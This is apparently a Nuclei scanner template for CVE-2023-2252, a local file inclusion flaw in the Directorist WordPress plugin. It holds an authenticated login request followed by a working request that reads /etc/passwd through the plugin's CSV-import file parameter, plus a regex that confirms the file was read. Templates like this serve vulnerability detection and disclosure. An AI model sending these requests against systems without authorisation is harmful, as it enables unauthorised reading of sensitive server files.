43 lines
1.5 KiB
YAML
43 lines
1.5 KiB
YAML
id: CVE-2023-2252
|
|
|
|
info:
|
|
name: Directorist < 7.5.4 - Local File Inclusion
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
|
|
remediation: Fixed in version 7.5.4
|
|
reference:
|
|
- https://wpscan.com/vulnerability/9da6eede-10d0-4609-8b97-4a5d38fa8e69
|
|
- https://wordpress.org/plugins/directorist/advanced/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-2252
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
tags: wpscan,cve,cve2023,lfi,directorist,wordpress,wp-plugin,wp,authenticated
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
- |
|
|
GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100b042e61606d69f9562a9b203c909295e5d7d9ea161dfdb48d24bfac6f801fc28022015ed1f232eaeed2d3517fded71b973babe5b7071dda064e6dc2f1cde0b24eb82:922c64590222798bb761d5b6d8e72950 |